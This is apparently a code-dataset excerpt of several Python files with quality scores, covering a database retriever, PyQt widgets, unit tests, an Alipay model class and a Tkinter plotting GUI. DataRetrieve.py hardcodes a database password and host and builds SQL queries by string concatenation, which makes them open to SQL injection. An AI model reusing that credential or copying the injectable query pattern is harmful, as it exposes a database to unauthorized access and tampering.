code
stringlengths
2k
1.04M
repo_path
stringlengths
5
517
parsed_code
stringlengths
0
1.04M
quality_prob
float64
0.02
0.95
learning_prob
float64
0.02
0.93
import pandas as pd from sqlalchemy import create_engine class DataRetriever: def retrieveAllData(): global fof_data global monthly #balance sheet global annually #balance sheet fof_data = DataRetriever.retrieve("records") monthly = DataRetriever.retrieve("monthly") annually = DataRetriever.retrieve("annually") def openConnection(): sqlEngine = create_engine('postgresql+psycopg2://postgres:CT1SEr.FtW@database-1.cczlh6s4kbhf.us-east-1.rds.amazonaws.com/data') dbConnection = sqlEngine.connect() return dbConnection def retrieve(table_name): print(table_name) dbConnection = DataRetriever.openConnection() global all_data all_data = pd.read_sql_table(table_name, dbConnection) print(all_data) dbConnection.close() return all_data def retrieveFofData(): return fof_data def retrieveMonthlyData(): return monthly def retrieveAnnuallyData(): return annually def pushToTable(userdata, username, datasource, requestType, usedGraphNames, description, graphName): dbConnection = DataRetriever.openConnection() description = description.replace("'", "''") if(requestType == "custom_request"): sqlStatement = "INSERT INTO user_custom_data(username, userdata, datasource) VALUES ('"+username+"', '"+ userdata +"' , '" + datasource +"');" elif(requestType == "important_request"): sqlStatement = "INSERT INTO important_graph_data(username, usedgraphnames, graphName, graphdatasource, description) VALUES ('"+username+"', '"+ usedGraphNames +"', '" + graphName +"', '"+ datasource +"', '"+ description+"');" print(sqlStatement) dbConnection.execute(sqlStatement) dbConnection.close() def pullFromTable(username, datasource, requestType): dbConnection = DataRetriever.openConnection() if(requestType == "custom_request"): sqlStatement = "SELECT userdata FROM user_custom_data WHERE username='" + username +"' AND datasource='"+datasource+"';" elif(requestType == "important_request"): sqlStatement = "SELECT usedgraphnames, graphname, description FROM important_graph_data WHERE username='" + username +"' AND graphdatasource='"+datasource+"';" print(sqlStatement) rs = dbConnection.execute(sqlStatement).fetchall() dbConnection.close() return rs
DataRetrieve.py
import pandas as pd from sqlalchemy import create_engine class DataRetriever: def retrieveAllData(): global fof_data global monthly #balance sheet global annually #balance sheet fof_data = DataRetriever.retrieve("records") monthly = DataRetriever.retrieve("monthly") annually = DataRetriever.retrieve("annually") def openConnection(): sqlEngine = create_engine('postgresql+psycopg2://postgres:CT1SEr.FtW@database-1.cczlh6s4kbhf.us-east-1.rds.amazonaws.com/data') dbConnection = sqlEngine.connect() return dbConnection def retrieve(table_name): print(table_name) dbConnection = DataRetriever.openConnection() global all_data all_data = pd.read_sql_table(table_name, dbConnection) print(all_data) dbConnection.close() return all_data def retrieveFofData(): return fof_data def retrieveMonthlyData(): return monthly def retrieveAnnuallyData(): return annually def pushToTable(userdata, username, datasource, requestType, usedGraphNames, description, graphName): dbConnection = DataRetriever.openConnection() description = description.replace("'", "''") if(requestType == "custom_request"): sqlStatement = "INSERT INTO user_custom_data(username, userdata, datasource) VALUES ('"+username+"', '"+ userdata +"' , '" + datasource +"');" elif(requestType == "important_request"): sqlStatement = "INSERT INTO important_graph_data(username, usedgraphnames, graphName, graphdatasource, description) VALUES ('"+username+"', '"+ usedGraphNames +"', '" + graphName +"', '"+ datasource +"', '"+ description+"');" print(sqlStatement) dbConnection.execute(sqlStatement) dbConnection.close() def pullFromTable(username, datasource, requestType): dbConnection = DataRetriever.openConnection() if(requestType == "custom_request"): sqlStatement = "SELECT userdata FROM user_custom_data WHERE username='" + username +"' AND datasource='"+datasource+"';" elif(requestType == "important_request"): sqlStatement = "SELECT usedgraphnames, graphname, description FROM important_graph_data WHERE username='" + username +"' AND graphdatasource='"+datasource+"';" print(sqlStatement) rs = dbConnection.execute(sqlStatement).fetchall() dbConnection.close() return rs
0.190988
0.183557
import os from typing import Dict, List, Optional, Tuple, Union from urllib.request import pathname2url import webbrowser from PyQt5.QtWidgets import QFileDialog, QTableWidgetItem, QWidget _TypeList = Optional[ Union[ List[Tuple[str, str]], Dict[str, str], List[str] ] ] class SortableTableWidgetItem(QTableWidgetItem): """ A :class:`QTableWidgetItem` which supports numerical sorting. .. automethod:: __init__ .. automethod:: __lt__ """ def __init__(self, text: str) -> None: """ Create a new sortable table widget item. :param str text: contents of the item :return: nothing :rtype: None """ super().__init__(text) def __lt__(self, other: "SortableTableWidgetItem") -> bool: """ Compare two items. :param SortableTableWidgetItem other: item to which self is compared :return: True if self is less than other :rtype: bool """ key1 = self.text() key2 = other.text() try: return float(key1) < float(key2) except ValueError: return key1 < key2 class FileTypes: """ A class for managing file types in :class:`~PyQt5.QtWidgets.QFileDialog` . :cvar dict _default_file_types: default file types :ivar list types: actually used file types :ivar list filters: filter strings .. automethod:: __init__ """ _default_file_types = { "xls": ("xls", "Excel 97-2003"), "xlsx": ("xlsx", "Excel"), "csv": ("csv", "Comma-separated value"), "png": ("png", "Portable network graphics"), "svg": ("svg", "Scalable vector graphics"), "gv": ("gv", "GraphViz DOT"), "gexf": ("gexf", "Graph exchange XML format"), "": ("", "all files") } def __init__(self, type_list: _TypeList=None) -> None: """ Create a new :class:`FileTypes` object. :param type_list: list of (extension, description) tuples or {ext: description} dict or list of extensions, which are then filtered from ``_default_file_types`` :type type_list: list(tuple(str, str)) or dict or list(str) :return: nothing :rtype: None :raise TypeError: if an invalid type was specified for ``ext_list`` """ if type_list is None: self.types = self._default_file_types return self.types = [] try: # dict for ext, description in sorted(type_list.items()): self.types.append((ext, description)) except AttributeError: try: # list of tuples for ext, description in type_list: self.types.append((ext, description)) except (TypeError, ValueError): self.types = [] try: # list of strings for ext in type_list: try: self.types.append(self._default_file_types[ext]) except KeyError: pass except (TypeError, ValueError): raise TypeError("Argument for 'ext_list' has wrong type") self.filters = ["{1} [{0}] (*.{0})".format(k, v) for k, v in self.types] def get_filter(self) -> str: """ Returns a file filter suitable for the ``filter`` parameter of :class:`~PyQt5.QtWidgets.QFileDialog`. :return: a file filter :rtype: str """ return ";;".join(self.filters) def get_type(self, filefilter: str) -> Tuple[str, str]: """ Returns the extension and description associated with a file filter. :param str filefilter: filefilter as returned by the dialog :return: the extension and description of the file type :rtype: tuple(str, str) """ return self.types[self.filters.index(filefilter)] def get_filename(parent: QWidget, kind: str="save", caption: str="", directory: str="", file_types: Optional[FileTypes]=None) -> Tuple[Optional[str], str]: """ Get a filename by a :class:`QFileDialog` and automatically add extensions. :param QWidget parent: parent of the dialog :param str kind: ``"save"`` or ``"open"``, chooses the dialog type :param str caption: caption of the dialog :param str directory: initial directory :param FileTypes file_types: file extensions :return: the file name with extension and the last path :rtype: tuple(str, str) :raise ValueError: if an invalid value was supplied to ``kind`` """ if file_types is None: file_types = FileTypes() if kind == "save": dialog = QFileDialog.getSaveFileName elif kind == "open": dialog = QFileDialog.getOpenFileName else: raise ValueError("Unknown value for 'kind': " + kind) filename, used_filter = dialog( parent, caption, directory, file_types.get_filter()) new_path = os.path.split(filename)[0] if not filename: return None, new_path ext, _ = file_types.get_type(used_filter) if not filename.endswith(ext): filename += "." + ext return filename, new_path def open_manual() -> None: """ Open the manual in a browser. :return: nothing :rtype: None """ path = os.path.abspath( os.path.join("docs", "_build", "html", "index.html")) webbrowser.open("file:{}".format(pathname2url(path)))
widgets.py
import os from typing import Dict, List, Optional, Tuple, Union from urllib.request import pathname2url import webbrowser from PyQt5.QtWidgets import QFileDialog, QTableWidgetItem, QWidget _TypeList = Optional[ Union[ List[Tuple[str, str]], Dict[str, str], List[str] ] ] class SortableTableWidgetItem(QTableWidgetItem): """ A :class:`QTableWidgetItem` which supports numerical sorting. .. automethod:: __init__ .. automethod:: __lt__ """ def __init__(self, text: str) -> None: """ Create a new sortable table widget item. :param str text: contents of the item :return: nothing :rtype: None """ super().__init__(text) def __lt__(self, other: "SortableTableWidgetItem") -> bool: """ Compare two items. :param SortableTableWidgetItem other: item to which self is compared :return: True if self is less than other :rtype: bool """ key1 = self.text() key2 = other.text() try: return float(key1) < float(key2) except ValueError: return key1 < key2 class FileTypes: """ A class for managing file types in :class:`~PyQt5.QtWidgets.QFileDialog` . :cvar dict _default_file_types: default file types :ivar list types: actually used file types :ivar list filters: filter strings .. automethod:: __init__ """ _default_file_types = { "xls": ("xls", "Excel 97-2003"), "xlsx": ("xlsx", "Excel"), "csv": ("csv", "Comma-separated value"), "png": ("png", "Portable network graphics"), "svg": ("svg", "Scalable vector graphics"), "gv": ("gv", "GraphViz DOT"), "gexf": ("gexf", "Graph exchange XML format"), "": ("", "all files") } def __init__(self, type_list: _TypeList=None) -> None: """ Create a new :class:`FileTypes` object. :param type_list: list of (extension, description) tuples or {ext: description} dict or list of extensions, which are then filtered from ``_default_file_types`` :type type_list: list(tuple(str, str)) or dict or list(str) :return: nothing :rtype: None :raise TypeError: if an invalid type was specified for ``ext_list`` """ if type_list is None: self.types = self._default_file_types return self.types = [] try: # dict for ext, description in sorted(type_list.items()): self.types.append((ext, description)) except AttributeError: try: # list of tuples for ext, description in type_list: self.types.append((ext, description)) except (TypeError, ValueError): self.types = [] try: # list of strings for ext in type_list: try: self.types.append(self._default_file_types[ext]) except KeyError: pass except (TypeError, ValueError): raise TypeError("Argument for 'ext_list' has wrong type") self.filters = ["{1} [{0}] (*.{0})".format(k, v) for k, v in self.types] def get_filter(self) -> str: """ Returns a file filter suitable for the ``filter`` parameter of :class:`~PyQt5.QtWidgets.QFileDialog`. :return: a file filter :rtype: str """ return ";;".join(self.filters) def get_type(self, filefilter: str) -> Tuple[str, str]: """ Returns the extension and description associated with a file filter. :param str filefilter: filefilter as returned by the dialog :return: the extension and description of the file type :rtype: tuple(str, str) """ return self.types[self.filters.index(filefilter)] def get_filename(parent: QWidget, kind: str="save", caption: str="", directory: str="", file_types: Optional[FileTypes]=None) -> Tuple[Optional[str], str]: """ Get a filename by a :class:`QFileDialog` and automatically add extensions. :param QWidget parent: parent of the dialog :param str kind: ``"save"`` or ``"open"``, chooses the dialog type :param str caption: caption of the dialog :param str directory: initial directory :param FileTypes file_types: file extensions :return: the file name with extension and the last path :rtype: tuple(str, str) :raise ValueError: if an invalid value was supplied to ``kind`` """ if file_types is None: file_types = FileTypes() if kind == "save": dialog = QFileDialog.getSaveFileName elif kind == "open": dialog = QFileDialog.getOpenFileName else: raise ValueError("Unknown value for 'kind': " + kind) filename, used_filter = dialog( parent, caption, directory, file_types.get_filter()) new_path = os.path.split(filename)[0] if not filename: return None, new_path ext, _ = file_types.get_type(used_filter) if not filename.endswith(ext): filename += "." + ext return filename, new_path def open_manual() -> None: """ Open the manual in a browser. :return: nothing :rtype: None """ path = os.path.abspath( os.path.join("docs", "_build", "html", "index.html")) webbrowser.open("file:{}".format(pathname2url(path)))
0.808332
0.214034
from credoscript import adaptors, models from tests import CredoAdaptorTestCase class ContactAdaptorTestCase(CredoAdaptorTestCase): def setUp(self): self.adaptor = adaptors.ContactAdaptor() self.expected_entity = models.Contact def test_fetch_by_contact_id(self): """Fetch a single Contact by contact_id""" self.assertSingleResult('fetch_by_contact_id', 1, 1) def test_fetch_all_by_atom_id(self): """Fetch all contacts an atom has by atom_id""" self.assertPaginatedResult('fetch_all_by_atom_id', 1, 1) def test_fetch_all_by_residue_id(self): """Fetch all contacts a residue has by residue_id""" self.assertPaginatedResult('fetch_all_by_residue_id', 1, 1) def test_fetch_all_by_ligand_id(self): """Fetch all contacts a ligand has by ligand_id""" ligand = models.Ligand.query.filter_by(ligand_name='J07').first() self.assertPaginatedResult('fetch_all_by_ligand_id', ligand.ligand_id, ligand.biomolecule_id) def test_fetch_all_by_chain_id(self): """Fetch all contacts a chain has by chain_id""" chain = models.Chain.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_chain_id', chain.chain_id, chain.biomolecule_id) def test_fetch_all_by_interface_id(self): """Fetch all contacts a chain has by interface_id""" interface = models.Interface.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_interface_id', interface.interface_id, interface.biomolecule_id) def test_fetch_all_by_groove_id(self): """Fetch all contacts a groove has by groove_id""" groove = models.Groove.query.get(1) self.assertPaginatedResult('fetch_all_by_groove_id', groove.groove_id, groove.biomolecule_id) def test_fetch_all_by_ligand_fragment_id(self): """Fetch all contacts a ligand fragment has by ligand_fragment_id""" ligand = models.Ligand.query.filter_by(path='2ZJV/1/A/CT4`301').first() lf = ligand.LigandFragments[3] self.assertPaginatedResult('fetch_all_by_ligand_fragment_id', lf.ligand_fragment_id, ligand.ligand_id) def test_fetch_by_ligand_id_and_atom_names(self): """Fetch the SIFt with a ligand_id and atom names""" ligand = models.Ligand.query.filter_by(path='3EFW/1/A/AK8`404').first() result = self.adaptor.fetch_all_by_ligand_id_and_atom_names(ligand.ligand_id, ligand.biomolecule_id, [['C7', 'C6', 'C5', 'C9', 'N3', 'C8', 'C2', 'C3', 'C4', 'N2', 'C1', 'N1']])
tests/adaptors/contactadaptortestcase.py
from credoscript import adaptors, models from tests import CredoAdaptorTestCase class ContactAdaptorTestCase(CredoAdaptorTestCase): def setUp(self): self.adaptor = adaptors.ContactAdaptor() self.expected_entity = models.Contact def test_fetch_by_contact_id(self): """Fetch a single Contact by contact_id""" self.assertSingleResult('fetch_by_contact_id', 1, 1) def test_fetch_all_by_atom_id(self): """Fetch all contacts an atom has by atom_id""" self.assertPaginatedResult('fetch_all_by_atom_id', 1, 1) def test_fetch_all_by_residue_id(self): """Fetch all contacts a residue has by residue_id""" self.assertPaginatedResult('fetch_all_by_residue_id', 1, 1) def test_fetch_all_by_ligand_id(self): """Fetch all contacts a ligand has by ligand_id""" ligand = models.Ligand.query.filter_by(ligand_name='J07').first() self.assertPaginatedResult('fetch_all_by_ligand_id', ligand.ligand_id, ligand.biomolecule_id) def test_fetch_all_by_chain_id(self): """Fetch all contacts a chain has by chain_id""" chain = models.Chain.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_chain_id', chain.chain_id, chain.biomolecule_id) def test_fetch_all_by_interface_id(self): """Fetch all contacts a chain has by interface_id""" interface = models.Interface.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_interface_id', interface.interface_id, interface.biomolecule_id) def test_fetch_all_by_groove_id(self): """Fetch all contacts a groove has by groove_id""" groove = models.Groove.query.get(1) self.assertPaginatedResult('fetch_all_by_groove_id', groove.groove_id, groove.biomolecule_id) def test_fetch_all_by_ligand_fragment_id(self): """Fetch all contacts a ligand fragment has by ligand_fragment_id""" ligand = models.Ligand.query.filter_by(path='2ZJV/1/A/CT4`301').first() lf = ligand.LigandFragments[3] self.assertPaginatedResult('fetch_all_by_ligand_fragment_id', lf.ligand_fragment_id, ligand.ligand_id) def test_fetch_by_ligand_id_and_atom_names(self): """Fetch the SIFt with a ligand_id and atom names""" ligand = models.Ligand.query.filter_by(path='3EFW/1/A/AK8`404').first() result = self.adaptor.fetch_all_by_ligand_id_and_atom_names(ligand.ligand_id, ligand.biomolecule_id, [['C7', 'C6', 'C5', 'C9', 'N3', 'C8', 'C2', 'C3', 'C4', 'N2', 'C1', 'N1']])
0.729423
0.451871
import mock import nose import ckan.new_tests.helpers as helpers import ckanext.datastore.db as db assert_equal = nose.tools.assert_equal class TestCreateIndexes(object): def test_creates_fts_index_by_default(self): connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('_full_text', connection, resource_id) @helpers.change_config('ckan.datastore.default_fts_lang', None) @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_with_english_as_default(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'english') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_with_config_var(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'simple') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_using_lang_param(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, 'lang': 'french', } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'french') def _assert_created_index_on(self, field, connection, resource_id, lang=None): if lang is not None: sql_str = u'ON "resource_id" USING gist(to_tsvector(\'{lang}\', \'{field}\'))' sql_str = sql_str.format(lang=lang, field=field) else: sql_str = u'USING gist({field})'.format(field=field) calls = connection.execute.call_args_list was_called = [call for call in calls if call[0][0].find(sql_str) != -1] assert was_called, ("Expected 'connection.execute' to have been ", "called with a string containing '%s'" % sql_str)
ckanext/datastore/tests/test_db.py
import mock import nose import ckan.new_tests.helpers as helpers import ckanext.datastore.db as db assert_equal = nose.tools.assert_equal class TestCreateIndexes(object): def test_creates_fts_index_by_default(self): connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('_full_text', connection, resource_id) @helpers.change_config('ckan.datastore.default_fts_lang', None) @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_with_english_as_default(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'english') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_with_config_var(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'simple') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_using_lang_param(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, 'lang': 'french', } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'french') def _assert_created_index_on(self, field, connection, resource_id, lang=None): if lang is not None: sql_str = u'ON "resource_id" USING gist(to_tsvector(\'{lang}\', \'{field}\'))' sql_str = sql_str.format(lang=lang, field=field) else: sql_str = u'USING gist({field})'.format(field=field) calls = connection.execute.call_args_list was_called = [call for call in calls if call[0][0].find(sql_str) != -1] assert was_called, ("Expected 'connection.execute' to have been ", "called with a string containing '%s'" % sql_str)
0.593491
0.227491
import json from alipay.aop.api.constant.ParamConstants import * class AccessProduceQrcode(object): def __init__(self): self._batch_id = None self._core_url = None self._produce_order_id = None self._qrcode = None @property def batch_id(self): return self._batch_id @batch_id.setter def batch_id(self, value): self._batch_id = value @property def core_url(self): return self._core_url @core_url.setter def core_url(self, value): self._core_url = value @property def produce_order_id(self): return self._produce_order_id @produce_order_id.setter def produce_order_id(self, value): self._produce_order_id = value @property def qrcode(self): return self._qrcode @qrcode.setter def qrcode(self, value): self._qrcode = value def to_alipay_dict(self): params = dict() if self.batch_id: if hasattr(self.batch_id, 'to_alipay_dict'): params['batch_id'] = self.batch_id.to_alipay_dict() else: params['batch_id'] = self.batch_id if self.core_url: if hasattr(self.core_url, 'to_alipay_dict'): params['core_url'] = self.core_url.to_alipay_dict() else: params['core_url'] = self.core_url if self.produce_order_id: if hasattr(self.produce_order_id, 'to_alipay_dict'): params['produce_order_id'] = self.produce_order_id.to_alipay_dict() else: params['produce_order_id'] = self.produce_order_id if self.qrcode: if hasattr(self.qrcode, 'to_alipay_dict'): params['qrcode'] = self.qrcode.to_alipay_dict() else: params['qrcode'] = self.qrcode return params @staticmethod def from_alipay_dict(d): if not d: return None o = AccessProduceQrcode() if 'batch_id' in d: o.batch_id = d['batch_id'] if 'core_url' in d: o.core_url = d['core_url'] if 'produce_order_id' in d: o.produce_order_id = d['produce_order_id'] if 'qrcode' in d: o.qrcode = d['qrcode'] return o
alipay/aop/api/domain/AccessProduceQrcode.py
import json from alipay.aop.api.constant.ParamConstants import * class AccessProduceQrcode(object): def __init__(self): self._batch_id = None self._core_url = None self._produce_order_id = None self._qrcode = None @property def batch_id(self): return self._batch_id @batch_id.setter def batch_id(self, value): self._batch_id = value @property def core_url(self): return self._core_url @core_url.setter def core_url(self, value): self._core_url = value @property def produce_order_id(self): return self._produce_order_id @produce_order_id.setter def produce_order_id(self, value): self._produce_order_id = value @property def qrcode(self): return self._qrcode @qrcode.setter def qrcode(self, value): self._qrcode = value def to_alipay_dict(self): params = dict() if self.batch_id: if hasattr(self.batch_id, 'to_alipay_dict'): params['batch_id'] = self.batch_id.to_alipay_dict() else: params['batch_id'] = self.batch_id if self.core_url: if hasattr(self.core_url, 'to_alipay_dict'): params['core_url'] = self.core_url.to_alipay_dict() else: params['core_url'] = self.core_url if self.produce_order_id: if hasattr(self.produce_order_id, 'to_alipay_dict'): params['produce_order_id'] = self.produce_order_id.to_alipay_dict() else: params['produce_order_id'] = self.produce_order_id if self.qrcode: if hasattr(self.qrcode, 'to_alipay_dict'): params['qrcode'] = self.qrcode.to_alipay_dict() else: params['qrcode'] = self.qrcode return params @staticmethod def from_alipay_dict(d): if not d: return None o = AccessProduceQrcode() if 'batch_id' in d: o.batch_id = d['batch_id'] if 'core_url' in d: o.core_url = d['core_url'] if 'produce_order_id' in d: o.produce_order_id = d['produce_order_id'] if 'qrcode' in d: o.qrcode = d['qrcode'] return o
0.540681
0.075687
import matplotlib matplotlib.use('TkAgg', warn=False) import scipy import numpy as np from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.figure import Figure from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm import matplotlib.pyplot as plt from Tkinter import * from tkFont import Font import ttk import ScrolledText import sys, os, weakref, copy from urlparse import urlparse, urlunsplit import h5py from puq import Parameter, PDF, ExperimentalPDF, options, pickle, unpickle, NetObj, gaussian_kde, SampledFunc import math import webbrowser, shutil, atexit, shelve import logging from logging import info, debug, exception, warning, critical from optparse import OptionParser from cnote import CNote, sq_colors, sq_image from tooltip import ToolTip class MyCombobox: def __init__(self, parent, txt, values, current, callback=None): self.var = StringVar() self.var.set(current) self.callback = callback self.cb = ttk.Combobox(parent, textvariable=self.var, values=values) self.cb.bind('<<ComboboxSelected>>', self.changed) self.cb.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self, event): #print "combobox changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) def state(self, st, path): self.cb.config(state=st) class MyLabel: def __init__(self, parent, text, value, bg=''): self.frame = Frame(parent, background='black', bd=1) if bg: self.label = Label(self.frame, text=value, bg=bg) else: self.label = Label(self.frame, text=value) self.desc = Label(self.frame, text=text) self.desc.pack(side=LEFT, anchor='w') self.label.pack(side=LEFT, anchor='w') def update(self, val): self.label.config(text=val) # radiobutton class RB: RB_list= [] def __init__(self, parent, values, val, callback=None): self.callback = callback RB.RB_list.append(weakref.proxy(self)) self.var = StringVar() self.var.set(val) for txt in values: b = Radiobutton(parent, text=txt, variable=self.var, value=txt, command=self.changed) b.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self): #print "RB changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) @staticmethod def get(name): for n in RB.RB_list: if name == n.txt: return n.var.get() class MyEntry: def __init__(self, parent, txt, var, val, callback=None): self.callback = callback self.var = var self.var.set(val) Label(parent, text=txt).pack(side=LEFT) self.entry = Entry(parent, textvariable=self.var, width=10) self.entry.bind('<Return>', self.changed) self.entry.pack(side=LEFT, padx=5, anchor='w') def changed(self, entry): #print "Entry changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) def update(self, val): self.var.set(val) class MB: def __init__(self, parent, plotframe, dframe): menubar = Menu(parent) parent['menu'] = menubar filemenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="File", menu=filemenu) #filemenu.add_command(label="Upload", command=ask_upload) #filemenu.add_separator() #filemenu.add_command(label="Preferences", command=preferences) #filemenu.add_separator() filemenu.add_command(label="Quit", command=root.quit) self.exportmenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="Export", menu=self.exportmenu) if dframe == None: self.exportmenu.add_command(label="Copy PDF to Clipboard", state=DISABLED) self.exportmenu.add_command(label="Export PDF as JSON", state=DISABLED) self.exportmenu.add_command(label="Export PDF to CSV file", state=DISABLED) else: self.exportmenu.add_command(label="Copy PDF to Clipboard", command=dframe.copy_clip, state=NORMAL) self.exportmenu.add_command(label="Export PDF as JSON", command=lambda: dframe.export_pdf('json'), state=NORMAL) self.exportmenu.add_command(label="Export PDF to CSV file", command=lambda: dframe.export_pdf('csv'), state=NORMAL) self.exportplot = Menu(self.exportmenu, tearoff=0) self.exportmenu.add_cascade(label="Plot to", menu=self.exportplot) fig = plt.figure() sup = fig.canvas.get_supported_filetypes() keys = sup.keys() keys.sort() for key in keys: lab = '%s : %s' % (key.upper(), sup[key]) self.exportplot.add_command(label=lab, command = lambda key=key: plotframe.plot(key)) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label="About", command=self.about) helpmenu.add_command(label="Online Help", command=self.open_help) menubar.add_cascade(label="Help", menu=helpmenu) parent.config(menu=menubar) def open_help(self): webbrowser.open('http://memshub.org/site/memosa_docs/puq/index.html') def about(self): from tkMessageBox import showinfo showinfo(message=__doc__, title='ABOUT') class ResponseFrame: def __init__(self, parent): self.tframe = Frame(parent) ResponseFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class PlotFrame: def __init__(self, parent): self.parent = parent # TOP FRAME - CANVAS self.f = plt.figure(figsize=(5, 5)) self.a = self.f.add_subplot(111) self.a.grid(True) #self.a.set_xlabel(self.description) self.a.set_ylabel("Probability") self.canvas = FigureCanvasTkAgg(self.f, master=parent) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) def update(self): self.canvas.draw() def get_plot(self): return self.a def plot(self, ext): from tkFileDialog import asksaveasfilename name = 'puq-plot' filename = asksaveasfilename(title="Plot to file...", initialfile=name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def PdfFactory(frame, obj, plotframe, nb=None, color=None, desc=None): state = None if isinstance(obj, PDF): if hasattr(obj, 'data'): state = 'PDF' else: state = 'PDF2' elif isinstance(obj, Parameter): if hasattr(obj.pdf, 'data'): state = 'PDF' else: state = 'PDF2' if state == 'PDF': return PdfFrameComplex(frame, obj, plotframe, nb=nb, color=color, desc=desc) if state == 'PDF2': return PdfFrameSimple(frame, obj, plotframe, nb=nb, color=color, desc=desc) print 'FACTORY RETURNING NONE' return None class PdfFrame: def get_color(self, color): if color == None: color = 'blue' elif isinstance(color, int): color = sq_colors[color] return color def copy_clip(self): root.clipboard_clear() root.clipboard_append(pickle(self.pdf)) def export_pdf(self, ext): # Dump pdf as csv, json, or python import csv from tkFileDialog import asksaveasfilename if self.par: name = '%s-pdf' % self.par.name else: name = 'PDF' extension = '.'+ext filetypes = [(ext.upper(), '*.%s' % ext)] filename = asksaveasfilename(title="Save PDF to CSV file...", initialfile=name, defaultextension=extension, filetypes=filetypes) if not filename: return if ext == 'csv': with open(filename, 'wb') as csvfile: spamwriter = csv.writer(csvfile) for x, prob in np.column_stack((self.pdf.x, self.pdf.y)): spamwriter.writerow([x, prob]) m = "Wrote %s pairs of (value, probability) data to '%s'.\n" % (len(self.pdf.x), filename) t = Toplevel(self.parent) t.title("Wrote CSV File") msg = Message(t, text=m, width=500) button = Button(t, text="OK", command=t.destroy) button.pack(side=BOTTOM) msg.pack(fill=BOTH, expand=1) elif ext == 'py': with open(filename, 'wb') as pyfile: 